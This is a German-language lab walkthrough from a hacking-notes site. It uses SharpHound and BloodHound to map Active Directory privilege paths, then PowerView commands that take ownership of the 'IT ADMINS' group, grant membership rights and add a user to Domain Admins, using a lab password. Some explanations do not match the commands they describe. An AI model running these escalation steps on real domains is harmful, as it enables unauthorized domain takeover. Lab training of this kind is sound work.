> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/active-directory/acl-security-descriptors-and-permissions/bloodhound-analysis.md).

# Analyse mit BloodHound

Nachdem die verwundbaren Objekte erstellt wurden, können Sie eine SharpHound-Sammlung neu starten:

{% code overflow="wrap" %}

```powershell
 . ./SharpHound.exe
```

{% endcode %}

<figure><img src="/files/1184732ea0089a45ca15beaf59ce19d96c010576" alt=""><figcaption></figcaption></figure>

SharpHound generiert eine `.zip` vorhandenen Benutzern.

Dann starten Sie BloodHound:

{% code overflow="wrap" %}

```powershell
bloodhound --no-sandbox &
```

{% endcode %}

Dann importieren wir die `.zip` Datei in BloodHound.

Nach dem Import sehen wir:

* neue Benutzer;
* neue Gruppen;
* die neuen ACLs;
* die Privilegienpfade;
* Beziehungen zwischen Objekten.

<figure><img src="/files/22a4715ce8a97b2fed0c9916568d10820cbf421c" alt=""><figcaption></figcaption></figure>

### Einen Pfad zu Domain Admin finden

<figure><img src="/files/cee5511d75aa3fef5fa8abf75f70d249e06c480e" alt=""><figcaption></figcaption></figure>

In BloodHound verwenden wir die Analyse:

{% code overflow="wrap" %}

```bash
Kürzeste Pfade zu Domänen-Admins finden
```

{% endcode %}

<figure><img src="/files/6899d93a7ee7baeff2f694f18b2c6227186b3887" alt=""><figcaption></figcaption></figure>

Diese Abfrage findet die kürzesten Pfade zur Gruppe der Domänen-Administratoren.

Im Labor zeigt BloodHound zum Beispiel eine Gruppe:

```bash
IT ADMINS
```

<figure><img src="/files/9c50a6b55c46aef58e712509f0f95a3d260654fb" alt=""><figcaption></figcaption></figure>

Diese Gruppe enthält mehrere Benutzer, zum Beispiel:

```bash
Deidre Corry
Lisette.pru
Gypsy.nelle
```

<figure><img src="/files/d0fe07036a19dc1d98d8aec0c7b9a8801a3af8eb" alt=""><figcaption></figcaption></figure>

Wir können dann die Beziehungen zwischen Gruppen analysieren, zum Beispiel:

```wasm
Projektmanagement -> IT ADMINS -> Domain Admins
```

Das Ziel ist zu verstehen, wie eine Fehlkonfiguration von Berechtigungen zu einer privilegierten Gruppe führen kann.

<figure><img src="/files/f40b3eddca6ba4ff3e5447c6becaf568774c5789" alt=""><figcaption></figcaption></figure>

### Ausnutzung einer fehlerhaften ACL-Konfiguration

> Dieser Schritt wird nur in einem autorisierten Labor durchgeführt.

In diesem Szenario hat der Benutzer `monica.cora` einen nutzbaren Pfad zur Gruppe:

```
IT ADMINS
```

Wir werden unsere Rechte nutzen, um die Kontrolle über diese Gruppe zu übernehmen, und dann zu einer privilegierteren Gruppe weitergehen.

<figure><img src="/files/3268a1890e6228fb8588b10d112b48a735715b34" alt=""><figcaption></figcaption></figure>

### Verbindung mit dem Benutzer monica.cora

<figure><img src="/files/49a429e581a2bcd4bb75a915e8c524a939dae1f0" alt=""><figcaption></figcaption></figure>

Wir verbinden uns mit dem Benutzer:

{% code overflow="wrap" %}

```
monica.cora
```

{% endcode %}

Im Labor verwendetes Passwort:

```
Password123$
```

Wir öffnen mit diesem Benutzer eine PowerShell-Sitzung:

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell">runas /user:whoami/monica.cora /netonly powershell

<strong>. C:/Users/user1/Desktop/PowerView.ps1
</strong></code></pre>

Erklärung:

* `runas` startet ein Programm mit einem anderen Benutzer;
* `/netonly` verwendet diese Anmeldedaten nur für den Netzwerkzugriff;
* `powershell` öffnet eine neue PowerShell-Sitzung.

### Laden von PowerView

In der neuen PowerShell-Sitzung:

{% code overflow="wrap" %}

```bash
Set-DomainObjectOwner -Identity "IT ADMINS" -OwnerIdentity monica.cora
```

{% endcode %}

Dadurch wird PowerView in `monica.cora`der Sitzung von.

<figure><img src="/files/fcdf1dbf0ec753a119f10e9f31916832f73edec6" alt=""><figcaption></figcaption></figure>

### Ausnutzung des WriteOwner-Rechts

Das **WriteOwner** Recht ermöglicht es Ihnen, den Besitzer eines Active-Directory-Objekts zu ändern.

In diesem Szenario, `monica.cora` wird zum Besitzer der Gruppe:

```
IT ADMINS
```

<figure><img src="/files/5b904d72ab47b51f7f9e777cb729ae15122c53e3" alt=""><figcaption></figcaption></figure>

Reihenfolge :

{% code overflow="wrap" %}

```powershell
Add-DomainObjectAcl -TargetIdentity "IT ADMINS" -Rights WriteMembers -PrincipalIdentity monica.cora
```

{% endcode %}

Nach diesem Schritt wird der Besitzer des Objekts:

```
WHOAMI/monica.cora
```

<figure><img src="/files/2702971c66458c2245c5b84931e5b02a84fdc8f0" alt=""><figcaption></figcaption></figure>

### WriteMembers-Recht hinzugefügt

Der Besitzer eines Objekts kann in der Regel seine DACL ändern.

Daher fügen wir für `monica.cora` das Recht hinzu, die Mitglieder der `IT ADMINS` Gruppe gehören.

{% code overflow="wrap" %}

```powershell
Add-DomainGroupMember -Identity 'IT ADMINS' -Members 'monica.cora'
```

{% endcode %}

Dieses Recht ermöglicht `monica.cora` Mitglieder zur `IT ADMINS` Gruppe gehören.

<figure><img src="/files/5400802fdc40c1811555569de51613464efeea01" alt=""><figcaption></figcaption></figure>

### monica.cora wurde der Gruppe IT ADMINS hinzugefügt

Jetzt fügen wir `monica.cora` der Gruppe hinzu:

{% code overflow="wrap" %}

```powershell
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'monica.cora'
```

{% endcode %}

Zur Überprüfung:

```wasm
Get-DomainGroupMember -Identity "IT ADMINS" | select MemberName
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/active-directory/acl-security-descriptors-and-permissions/bloodhound-analysis.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
